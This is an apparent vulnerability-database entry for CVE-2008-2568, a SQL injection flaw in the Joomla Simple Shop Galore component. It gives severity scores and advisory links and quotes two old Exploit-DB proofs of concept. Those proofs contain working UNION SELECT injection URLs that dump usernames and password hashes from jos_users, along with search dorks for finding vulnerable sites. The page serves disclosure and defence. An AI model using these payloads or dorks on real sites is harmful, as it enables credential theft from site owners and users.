CVE-2008-2568
published 2008-06-06CVE-2008-2568: SQL injection vulnerability in the Simple Shop Galore (com_simpleshop) component 3.4 and earlier for Joomla! allows remote attackers to execute arbitrary SQL…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.05%
60.0th percentile
SQL injection vulnerability in the Simple Shop Galore (com_simpleshop) component 3.4 and earlier for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in a browse action to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomla | com_simpleshop | <= 3.4 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-7rx9-44vm-355p: SQL injection vulnerability in the Simple Shop Galore (com_simpleshop) component for Joomla! allows remote attackers to execute arbitrary SQL commands
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2008-7033 [HIGH] CWE-89 GHSA-7rx9-44vm-355p: SQL injection vulnerability in the Simple Shop Galore (com_simpleshop) component for Joomla! allows remote attackers to execute arbitrary SQL commands
SQL injection vulnerability in the Simple Shop Galore (com_simpleshop) component for Joomla! allows remote attackers to execute arbitrary SQL commands via the section parameter in a section action to index.php, a different vulnerability than CVE-2008-2568. NOTE: this issue was disclosed by an unreliable researcher, so the details might be incorrect.
GHSA
GHSA-8883-6grw-qmw4: SQL injection vulnerability in the Simple Shop Galore (com_simpleshop) component 3
ghsa_unreviewed·2022-05-01
CVE-2008-2568 [HIGH] CWE-89 GHSA-8883-6grw-qmw4: SQL injection vulnerability in the Simple Shop Galore (com_simpleshop) component 3
SQL injection vulnerability in the Simple Shop Galore (com_simpleshop) component 3.4 and earlier for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in a browse action to index.php.
No detection rules found.
Exploit-DB
Joomla! Component Simple Shop Galore 3.x - 'catid' SQL Injection
exploitdb·2008-06-16
CVE-2008-2568 Joomla! Component Simple Shop Galore 3.x - 'catid' SQL Injection
Joomla! Component Simple Shop Galore 3.x - 'catid' SQL Injection
---
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
@ Joomla ~ option: com_simpleshop ~ SQL Injection
@ AUTHOR: eXeCuTeR
@ HOME: milw0rm.com
@ DORK: :\
@ Vuln:
index.php?option=com_simpleshop&task=browse&Itemid=eXeCuTeR&catid=null%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8%20from%20jos_users--
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
~EOF~
side note:
same vulnerability listed here: http://milw0rm.com/exploits/5743
but this was sent in back in 02/2008, must of missed it. Original author: eXeCuTeR.
# milw0rm.com [2008-06-16]
Exploit-DB
Joomla! Component SimpleShop 3.4 - SQL Injection
exploitdb·2008-06-05
CVE-2008-2568 Joomla! Component SimpleShop 3.4 - SQL Injection
Joomla! Component SimpleShop 3.4 - SQL Injection
---
/---------------------------------------------------------------\
\ /
/ Joomla Component simpleshop Remote SQL injection \
\ /
\---------------------------------------------------------------/
[*] Author : His0k4 [ALGERIAN HaCkEr]
[*] Dork : inurl:com_simpleshop
[*] Dork : inurl:com_simpleshop "catid"
[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_simpleshop&task=browse&Itemid=29&catid={SQL}
[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user() FROM jos_users--
[*] Greetings : Str0ke, all friends & muslims HaCkeRs...
# milw0rm.com [2008-06-05]
No writeups or analysis indexed.
http://secunia.com/advisories/30461http://www.securityfocus.com/bid/29565https://exchange.xforce.ibmcloud.com/vulnerabilities/42871https://www.exploit-db.com/exploits/5743https://www.exploit-db.com/exploits/5833http://secunia.com/advisories/30461http://www.securityfocus.com/bid/29565https://exchange.xforce.ibmcloud.com/vulnerabilities/42871https://www.exploit-db.com/exploits/5743https://www.exploit-db.com/exploits/5833
2008-06-06
Published